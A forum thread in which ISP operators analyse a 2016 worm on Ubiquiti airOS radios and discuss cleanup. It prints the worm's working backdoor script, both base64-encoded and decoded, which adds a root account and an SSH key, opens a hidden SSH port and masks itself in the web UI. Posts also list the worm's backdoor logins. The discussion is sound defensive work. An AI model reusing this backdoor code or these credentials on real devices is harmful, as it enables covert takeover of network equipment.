Перейти до

SDE

Рекомендованные сообщения

ubnt@xxx.xxx.xxx.xxx's password:

 

 

BusyBox v1.11.2 (2013-05-28 17:52:06 EEST) built-in shell (ash)

Enter 'help' for a list of built-in commands.

 

XM.v5.5.6# ls -lA

-rw-------    1 ubnt     admin         459 Apr  6  2012 dropbear_dss_host_key

-rw-------    1 ubnt     admin         427 Apr  6  2012 dropbear_rsa_host_key

-rw-------    1 ubnt     admin       20055 Dec 14 03:02 mf.tar

-rwxr-xr-x    1 ubnt     admin        1857 Dec 13 00:59 rc.prestart

XM.v5.5.6#

XM.v5.5.6#

XM.v5.5.6#

XM.v5.5.6#

XM.v5.5.6# cat rc.prestart

#!/bin/sh

mkdir -p /var/bin

cat << EOFEOFEOF | uudecode -o /var/bin/cgi -

begin-base64 755 -

IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl

bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz

YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t

ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM

ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1

R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH

QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z

a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w

Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv

cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp

clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0

Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r

ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl

bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt

YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k

ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg

LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF

UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv

cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn

c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp

Jwo=

====

EOFEOFEOF

chmod 755 /var/bin/cgi 2>/dev/null

sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf

sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf

-------------------------

Попробуем заглянуть внутрь...

 


XM.v5.5.6# cat << EOFEOFEOF | uudecode -o /tmp/cgi -

> begin-base64 755 -

> IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl

> bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz

> YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t

> ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM

> ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1

> R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH

> QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z

> a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w

> Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv

> cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp

> clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0

> Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r

> ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl

> bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt

> YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k

> ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg

> LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF

> UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv

> cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn

> c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp

> Jwo=

> ====

> EOFEOFEOF

 

 


XM.v5.5.6# ls -l /tmp/cgi

-rwxr-xr-x    1 ubnt     admin        1142 Dec 17 03:33 /tmp/cgi

 


XM.v5.5.6# cat /tmp/cgi

#!/bin/sh

if [ "$HTTP_HOST" = "localhost.localnet" ]; then

        PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH

        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys

        echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd

 

        if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then

                dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1

        fi

 

        dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null

        iptables -I INPUT -p tcp --dport 22 -j ACCEPT

        iptables -I INPUT -p tcp --dport 27591 -j ACCEPT

fi

 

grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)'


XM.v5.5.6# netstat -nl

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address           Foreign Address         State

tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN

tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN

tcp        0      0 :::80                   :::*                    LISTEN

tcp        0      0 :::53                   :::*                    LISTEN

tcp        0      0 :::22                   :::*                    LISTEN

--------------

Однако не активен бэкдор...

Тот который dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null

Ибо if [ "$HTTP_HOST" = "localhost.localnet" ]; then

Хм...

Странный вирус...

Или то не вирус?

 

Походу активируется отсюда 

sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf

sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf

 

 

 

Ну, собственно


cgi.assign = (

        "/ipscan.cgi" => "",

        "/signal.cgi" => "",

        "/status.cgi" => "",

        "/glogo.cgi" => "",

        "/status-new.cgi" => "",

        "/ifstats.cgi" => "",

        "/iflist.cgi" => "",

        "/air-view.cgi" => "",

        ".jnlp"       => "/var/bin/cgi",

        ".cgi"        => "/var/bin/cgi",

        ".sh"         => "/bin/sh"

)

 



--2016-05-22 22:13:40--  http://xxx.xxx.xxx.xxx/.cgi

Connecting to xxx.xxx.xxx.xxx:80... connected.

HTTP request sent, awaiting response... 302 Found

Location: /cookiechecker?uri=/.cgi [following]


Reusing existing connection to xxx.xxx.xxx.xxx:80.

HTTP request sent, awaiting response... 302 Found

Location: /.cgi [following]

--2016-05-22 22:13:40--  http://xxx.xxx.xxx.xxx/.cgi

Reusing existing connection to xxx.xxx.xxx.xxx:80.

HTTP request sent, awaiting response... 302 Found

Location: /login.cgi?uri=/.cgi [following]


Reusing existing connection to xxx.xxx.xxx.xxx:80.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/html]

Saving to: ‘.cgi’

 

.cgi                                                [ <=>                                                                                                      ]   2.85K  --.-KB/s   in 0.001s

 

2016-05-22 22:13:40 (1.92 MB/s) - ‘.cgi’ saved [2916]

 


resolv:~ # cat .cgi

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>Login</title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta http-equiv="Pragma" content="no-cache">

<meta http-equiv="Expires" content="0">

<meta http-equiv="Cache-Control" content="no-cache">

<link rel="shortcut icon" href="/130528.1754/favicon.ico" >

<link href="/130528.1754/login.css" rel="stylesheet" type="text/css">

<link href="/130528.1754/style.css" rel="stylesheet" type="text/css">

<script type="text/javascript" src="/130528.1754/js/jquery.js"></script>

<script type="text/javascript" src="/130528.1754/util.js"></script>

<script type="text/javascript" src="/130528.1754/index.js"></script>

<script type="text/javascript" language="javascript">

//<!--

var globals = {

        first_login : false,

        postback : false,

        fixed : false,

        country : ""

};

 

function onLangChange() {

        $("#lang_changed").val("yes");

        $("#loginform").submit();

}

 

function validateForm() {

        if ($("#lang_changed").val() == "yes")

                return true;

 

        if ($("#country").val() == "0") {

                $("#errmsg").text("Please select your country.");

                return false;

        }

 

        if (!$("#agreed").is(":checked")) {

                $("#errmsg").html("To use this product, you must agree to<br/>terms of use.");

                return false;

        }

 

        return true;

}

 

$(document).ready(function() {

        $("#username").focus();

        cache_images([

                'main_top.png', 'main.png', 'link.png',

                'net.png', '4dv.png', 'srv.png',

                'system.png', 'border.gif', 'spectr.gif']);

 

        if (globals.first_login) {

                $("#ui_language").change(onLangChange);

                $("#loginform").submit(validateForm);

                if (!globals.postback && !globals.fixed)

                        $("#country").val(0);

                else

                        $("#country").val(globals.country);

        }

});

//-->

</script>

</head>

 

<body>

<table border="0" cellpadding="0" cellspacing="0" align="center" class="loginsubtable">

<form enctype="multipart/form-data" id="loginform" method="post" action="/login.cgi">

        <tr>

                <td valign="top"><img src="/130528.1754/images/airos_logo.png"></td>

                <td class="loginsep">

                                <input type="hidden" name="uri" id="uri" value="/.cgi" />

                                <table border="0" cellpadding="0" cellspacing="0" class="logintable" align="center">

                                        <tr>

                                                <td colspan="2" align="center">

                                                        <div id="errmsg" class="error">

 

                                                        </div>

                                                </td>

                                        </tr>

                                        <tr>

                                                <td colspan="2"> </td>

                                        </tr>

                                        <tr>

                                                <td><label for="username">Username:</label></td>

                                                <td><input type="text" name="username" id="username" /></td>

                                        </tr>

                                        <tr>

                                                <td><label for="password">Password:</label></td>

                                                <td><input type="password" name="password" id="password" maxlength="8"/></td>

                                        </tr>

 

                                        <tr>

                                                <td colspan="2"> </td>

                                        </tr>

                                </table>

                </td>

        </tr>

 

        <tr>

                <td>

 

                </td>

                <td class="submit" align="right">

                        <input type="submit" value="Login" />

                </td>

        </tr>

</form>

</table>

</body>

</html>

 

Т.е. запаролено...

Без пароля бэкдор не запустить...







Відредаговано steelrat
Ссылка на сообщение
Поделиться на других сайтах
  • Відповіді 58
  • Створено
  • Остання відповідь

Top Posters In This Topic

Господа, пожалуйста доступно объясните, чем конкретно чревато заражение данной порчей?

Ибо после последних гроз в сети наблюдаю явный сглаз.

Ссылка на сообщение
Поделиться на других сайтах

Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid.

Закрывает доступ к web-интерфейсу.

И начинает размножаться.

Остается только ssh.

Ссылка на сообщение
Поделиться на других сайтах

Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid.

Закрывает доступ к web-интерфейсу.

И начинает размножаться.

Остается только ssh.

Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться.

Ссылка на сообщение
Поделиться на других сайтах

 

Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid.

Закрывает доступ к web-интерфейсу.

И начинает размножаться.

Остается только ssh.

Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться.

 

На базовых точно начинает размножаться. Т.е. пытается сканировать и заражать другие адреса...

Ссылка на сообщение
Поделиться на других сайтах

Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали.

Ссылка на сообщение
Поделиться на других сайтах

Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали.

А управление закрыто?

Ссылка на сообщение
Поделиться на других сайтах

 

Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали.

А управление закрыто?

 

с юзерских сеток туда достучаться реально. Извне - нет. Доступа к наружке нет, возможно из-за этого скрипты вируса с curlом не отработали.

Ссылка на сообщение
Поделиться на других сайтах

Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали.

Палюбому, у кого-то из клиентов был убнт девайс, аирроутер например, с белым айпи.

Ссылка на сообщение
Поделиться на других сайтах

 

 

Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid.

Закрывает доступ к web-интерфейсу.

И начинает размножаться.

Остается только ssh.

Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться.

 

На базовых точно начинает размножаться. Т.е. пытается сканировать и заражать другие адреса...

 

Да, на базовых и клиентах начинает размножаться, без доступа к downloads.openwrt.org примерно с неделю зараженная точка, позаражала "серых" соседей, при этом клиента в АП не переводила, сеть работала только по отсутствию доступа к веб заметили.

Если у кого то есть желание и возможность, зарядить детальную статистику(зеркалировать траф с порта), и выставить в МИР наживку, посмотреть что оно дальше делать будет. :rolleyes:  :ph34r:

Ссылка на сообщение
Поделиться на других сайтах
  • 1 month later...

Подскажите! Может кто знает? Какой логин пароль подкидывает вирус на зараженной ubnt

mother

fucker

http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/m-p/1563635/highlight/true#M55060

**********************
Причина вирусной атаки - уволенный сотрудник, либо интегрированный агент компании конкурента.
Пострадало оборудование - CPE либо AP устройства Ubiquiti имеющие белый IP адрес в глобальной сети Интернет (IPv4.PPPoE, IPv4.DHCP, IPv6).


Цели вирусной атаки:
1. Нанесение вреда сети
2. Получение доступа к локальным сегментам транспортной сети
3. Борьба конкурентов
4. Получение доступа к локальной сети абонентов через прокси
5. Перехват трафика
6. Бесплатный доступ к радиосети


Метод загрузки вредного кода - через скрипты lighttpd сервера CGI скрипты.
Метод обеспечения работоспособности:
1. добавляется пользователь SSH под именем mother и паролем f u c k e r
2. Запускается служебный TCP socket прямой связи

Ubiquiti очень виновата! Наша сеть, размером почти 4000 абонентов тоже пострадала - россия, алтайский край.
Позор производителью оборудования! Отключаем везде lighttpd...
 
В CGI скриптах index.cgi logo.cgi написан вредный код, загрузка вируса произвелась через эти скрипты по команде от злоумышленника
Відредаговано Ромка
Ссылка на сообщение
Поделиться на других сайтах
  • 1 month later...

Добрый день. Столкнулись и мы с этим вирусом. Расскажите плз, то что нужно перешивать антенны я понял, и то что вирус поразил веб интерфейс тоже. Но ssh отвечает, но пароль естественно не подходит. Некоторые пароли я попробовал (moth3r:f u c k e.3r ; mother  f u c k e r ; moth3/fucker ; moth3r/fucker ; moth3r/fuck.3r ; moth3r/f u c k e r 2) но все это безуспешно. Я понимаю, что скорее всего придется всех абонов объехать. Но может кто то нашел как это сделать по сети. Антенны все в сети. Абоны инет получают, но зайти на антенны я не могу. Заранее спасибо

Ссылка на сообщение
Поделиться на других сайтах

Кому еще нужно. Сразу скриптом убикути  http://www.ubnt.com/downloads/XN-fw-internal/tools/ubnt-CureMalware.zip     https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949   и сканировать и удалить прошить (3), потом пароли для входа  

Заход на устройство

moth3/fucker
moth3r/fucker
moth3r/fuck.3r

 

У меня было логин   moth3r  пароль  fuck.3r , перепрошьется без компилянце тест, потом перепрошиваете 5.6.5-ст  тут в разделе https://local.com.ua/forum/index.php?app=core&module=attach&section=attach&attach_id=95827, но более удобно через AirControl .Post 4 http://asp24.com.ua/blog/ubiquiti-virus/

Ссылка на сообщение
Поделиться на других сайтах

есть на писаный самостоятельный антивирус вводите логин пароль и рендж ip и ждете он чистит и закрывает все порты открывает 8080 порт и прописывает в iptables правила

так я вылечил все антенны

Ссылка на сообщение
Поделиться на других сайтах

Пароли ( Типа moth3r fuck.3r) пробовал вводить, ругается... следовательно просканировать и излить устройства удаленно не возможно. Вы говорите об антивирусе, рендж ip и так далее, это я так понимаю то что написали производители, с ним тоже беда. Пароль и логин не подходит.

Ссылка на сообщение
Поделиться на других сайтах
  • 1 month later...

Новая напасть?

Airgrid 5 стоит в качестве базовой. Дальше со слов оператора - звонит абон что нет инета, смотрит в биллинге и не видит точку клиента.

Заходит на базовую через вебморду - ему сразу выдает на странице main вверху надпись типа (с его слов) не хватает физической памяти и типа для её очистки скачайте файл отсюда" (и линк на файл). Оператор файл не скачивал а тупо взял точку перегрузил удаленно. И привет! Веб морда отпала, на пинг отвечает, по телнету или ssh заходит но после ввода пароля сразу отпадает и пишет что коннект закрыт. База далеко, доедем только завтра. версия стояла 5.6.6.

Кто сталкивался с такой фигней.

вот такое выдает когда по ssh заходишь

 
root@net:/root # ssh net@10.1.0.250
net@10.1.0.250's password:
   KM                       ,ok0KNWW
         KM               :NMMMMMMMM
       KM  ..             WMMMMMMMMM
   KM      KM             WMMMMMMMMM
   KM    KM               WMMMMMMMMM
   KM  KM  ..             WMMMMMMMMM
   KM  ..  KM             WMMMMMMMMM
   KM  KM  KM             WMMMMMMMMM
   KMNXWM  KM             WMMMMMMMMK
   KMMMMMKONM             WMMMMMMMW
   KMMMMMMMMM             WMMMMMMM x
   lMMMMMMMMM             WMMMMMN xK
    MMMMMMMMMl           ,WMMMP dXM:
    lMMMMMMMMx .        ,,,aaadXMMd
     lNMMMMMMW: XOxolcclodOKMMMMWc
       lXMMMMMNc lMMMMMMMMMMMMNo.
         llONMMM0c lMMMMMMNOo'
              'lMN;. lMWl'
 
 
BusyBox v1.11.2 (2016-05-26 12:19:53 EEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
Connection to 10.1.0.250 closed.
Ссылка на сообщение
Поделиться на других сайтах

Похоже умерла флешка.

 

Заходит на базовую через вебморду - ему сразу выдает на странице main вверху надпись типа (с его слов) не хватает физической памяти и типа для её очистки скачайте файл отсюда" (и линк на файл).

Это случайно не ссылка на скачать файл с самой убнтшки для отправки в дальнейшем в саппорт убнт ? :)

Пусть скрин в следущий раз делает.

Відредаговано sanyadnepr
Ссылка на сообщение
Поделиться на других сайтах

Похоже умерла флешка.

 

Заходит на базовую через вебморду - ему сразу выдает на странице main вверху надпись типа (с его слов) не хватает физической памяти и типа для её очистки скачайте файл отсюда" (и линк на файл).

Это случайно не ссылка на скачать файл с самой убнтшки для отправки в дальнейшем в саппорт убнт ? :)

Пусть скрин в следущий раз делает.

 

Да хрен его знает теперь что там было.

Ссылка на сообщение
Поделиться на других сайтах

Хочу сказать спасибо за выложенные  пароли !! очень помогли !

Кому еще нужно. Сразу скриптом убикути  http://www.ubnt.com/downloads/XN-fw-internal/tools/ubnt-CureMalware.zip     https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949   и сканировать и удалить прошить (3), потом пароли для входа  

Заход на устройство

moth3/fucker
moth3r/fucker
moth3r/fuck.3r

 

У меня было логин   moth3r  пароль  fuck.3r , перепрошьется без компилянце тест, потом перепрошиваете 5.6.5-ст  тут в разделе https://local.com.ua/forum/index.php?app=core&module=attach&section=attach&attach_id=95827, но более удобно через AirControl .Post 4 http://asp24.com.ua/blog/ubiquiti-virus/

Ссылка на сообщение
Поделиться на других сайтах
  • 2 weeks later...

Вот и нас постигла сия участь. Часть мостов и секторов пускают по вирусному логину и паролю. Беда еще в том, что мы используем скрипты (добавляем интерфейсы для вланов) и много где частоты из ct. Какая в таком случае последовательность действий по лечению вируса.

Ссылка на сообщение
Поделиться на других сайтах

Вот и нас постигла сия участь. Часть мостов и секторов пускают по вирусному логину и паролю. Беда еще в том, что мы используем скрипты (добавляем интерфейсы для вланов) и много где частоты из ct. Какая в таком случае последовательность действий по лечению вируса.

Наверное сброс точки  и ее перепрошив

Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Вхід

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Зараз на сторінці   0 користувачів

    Немає користувачів, що переглядають цю сторінку.

  • Схожий контент

    • Від Інет.укр
      Продам 2011 червоний без sfp 1100грн
      з sfp 1300грн
      rb2011iL-rm 1500грн
      ubnt aircube  400грн
       
    • Від Biker13
      Цікавить питання, може хтось вже пробував. 
      Як можна в ubnt M серії в веб інтерфейсі залишити лише аналізатор спектру і більше нічого?
      Тобто щоб можна було залогінитись (можна і без логіна) на антену та одразу бачити спектр частот і все що там відбувається. Потрібно максимально швидке завантаження і лише одна функція.
      На питання "для чого?" відповідати не буду, нажаль трішки не той час. 
      В кого є ідеї напишіть будь ласка.
    • Від Mykola_
      2шт Powerbeam 5ac 500 бу ,в ремонте не были  .На одном лопнул защитный корпус , внутри в идеальном состоянии. В комплекте пое . Цена за один 4100



    • Від Туйон
      Нужно сделать временный радиомост.
      Куплю две живые, не ремонтированные, на 100% рабочие Loco M5 по адекватной цене.
      Можно без РОЕ.
      Предложения в ЛС.
    • Від Geely13
      Продам две головки Ubqt, вроде рабочие разбирались что бы добраться до резета, по 150 грн штука



×
×
  • Створити нове...